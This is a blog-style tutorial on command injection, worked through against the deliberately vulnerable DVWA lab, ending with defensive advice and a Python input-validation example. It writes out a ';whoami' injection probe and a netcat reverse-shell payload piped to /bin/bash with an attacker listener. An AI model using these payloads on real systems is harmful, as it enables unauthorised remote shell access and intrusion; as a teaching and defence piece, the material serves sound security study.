Command Injection



For Educational Purposes Only.

Introduction:

Injection attacks are some of the most common attacks out there, and they are featured in the OWASP Top 10 list of Web Application Security Risks. In this blog, we are going to study Command Injection and do some practical pentesting with it.


Working of Injection attacks:

The concept behind injection attacks is quite brilliant, to be honest. You have probably come across text fields on websites that ask you to fill them in. The reason for their existence might be simple: to search the backend database for your account, to ping another IP address, or something else. As an attacker, you don’t want the website to work in the way it is intended. So you slightly modify your inputs. Instead of normal input, you type malicious code into the text field (it might be SQL, XSS, or anything else). The application processes that code, which causes it to behave in a way, or give an output, that it shouldn’t have.

This is the basic idea of an injection attack. It’s simple, yet it can cause huge amounts of damage to the website. The attacker can read the users’ passwords, delete the entire database just for fun, or install viruses and malware on the system; the options after this are nearly limitless.


Doing a command injection:

Command Injection is a type of injection attack where malicious input is fed into the command line of a computer (for example, Linux has the Terminal as its command line). In my opinion, this is the most dangerous injection attack out there. Why? It’s because other injection attacks give access only to the database, while command injection gives the attacker access to the victim’s computer itself. The attacker can then perform privilege escalation to gain root access.


I have done a command injection on a website/virtual machine that is intentionally made vulnerable. Do not perform any attacks on websites you don’t have permission to test.

1) Download and install OWASPBWA virtual machine.
OWASPBWA Download


2) Once the virtual machine is running, it hosts the website at 192.168.139.129 (the IP address will vary for you). As the host is now up, the website will be available, so copy the IP address and type it into your browser to go to the website.




3) Go into the “Damn Vulnerable Web Application”. Log in with the username “admin” and the password “admin”.

4) Go into the “Command Execution” section. This page is used to ping other IP addresses. Let's give “google.com” as input and see what the output is.



It does exactly what it said it would do. It pings the specified host 3 times and shows the output.

5) To see if a website is vulnerable to command injection, input the following command -

<IP Address>;whoami


What this does is input the IP address first. There is no problem with that. But on the command line, a “;” indicates that the command to the left of it has ended, so whatever we type to its right is run as a second command. If the website were not vulnerable to command injection, it would show an error. But this website runs both commands and shows the output of both. So it is vulnerable.



We could inject whatever command we want right here, but that is not very efficient and not much fun either. So we are going to create a backdoor using NetCat.


Setting a backdoor using NetCat:

“Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts” -Wikipedia

We are going to use Netcat to create and connect to a backdoor in the victim machine.

1) Preparing to listen

First, let's tell our computer to listen for incoming connections. To do that, type “nc -lp <port number>” in your attacking machine.


where nc = netcat

      -l = listen mode

      -p = port

      <port number> = whatever port you want to listen on. I’m choosing port 1234.


Our attacking machine is now listening for connections on port 1234. Now let us set up a backdoor on the victim machine.


2) Setting up a connection

Type the following in the text field in the website

“;nc.traditional -e/bin/bash <IP address of attacker machine> <portnumber>”


where “nc.traditional -e” = the traditional Netcat variant, with -e naming the program to run once the connection is made

      “/bin/bash” = the Bourne Again Shell, which Netcat runs and attaches to the connection

      <ip address of attacker machine> = tells the victim machine where to connect to

      <port number> = the same port number as in step (1). That way, both computers use the same port.

That’s it. Both computers are now connected, and we can access the victim machine from the terminal of our attacking machine.


To test that it works, I’m running a simple “ls” command, which lists the contents of a directory.


It works!!


How to protect against command injection attacks?

The best way to protect your website is to filter the input for special characters. Characters like ; ‘ “ and many more are the main ones used in injection attacks. If the website filters these characters, the injected code is of no use.
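As an added example (not code from the original post or from DVWA, which is written in PHP), here is the defensive side of the step-5 test and of the filtering fix described above, in Python: a blocklist check for the shell metacharacters named above next to the stricter approach of allowlisting the ping target and passing it to the command as a separate argv element so that no shell ever sees a “;”. The sample inputs, the hostname regex and the function names are constructed for this example.

```python
import ipaddress
import re
import subprocess

# Constructed sample inputs: the benign targets from the walkthrough, the
# step-5 test string, and a malformed host that contains no metacharacters.
SAMPLE_INPUTS = ["google.com", "192.168.139.129", "192.168.139.129;whoami", "google.com extra"]

# Blocklist for the filter described above. A blocklist is only as good as its
# completeness, so use it as a second check behind the allowlist below.
SHELL_METACHARS = set(";|&$`<>()\n'\"\\")

# Allowlist: RFC 1123 hostname (dot-separated labels of letters, digits, hyphens).
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)

def contains_shell_metachars(value: str) -> bool:
    """Blocklist check: True if any shell metacharacter appears in the input."""
    return any(ch in SHELL_METACHARS for ch in value)

def is_valid_ping_target(value: str) -> bool:
    """Allowlist check: accept only an IP literal or a well-formed hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(value) is not None

def build_ping_argv(target: str) -> list[str]:
    """Hardened form of `ping -c 3 <target>`: validate, then pass the target as one
    argv element so no shell ever parses it and ';' cannot start a second command."""
    if not is_valid_ping_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "3", target]

def run_ping(target: str) -> str:
    # shell=False (the default): the argv list goes straight to execve().
    done = subprocess.run(build_ping_argv(target), capture_output=True, text=True, timeout=15)
    return done.stdout

if __name__ == "__main__":
    for value in SAMPLE_INPUTS:
        print(f"{value!r:28} blocklist_hit={contains_shell_metachars(value)!s:5} "
              f"allowlisted={is_valid_ping_target(value)}")
```

The fourth sample input passes the blocklist but fails the allowlist, which is why validating what the input must look like is more robust than listing what it must not contain.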


Conclusion :

The power of injection attacks lies in how easy they are to perform. This didn’t require any specific tool. All we needed was a built-in tool and a little command-line knowledge. Because of this, every website on the internet should take the necessary precautions to fix these vulnerabilities.
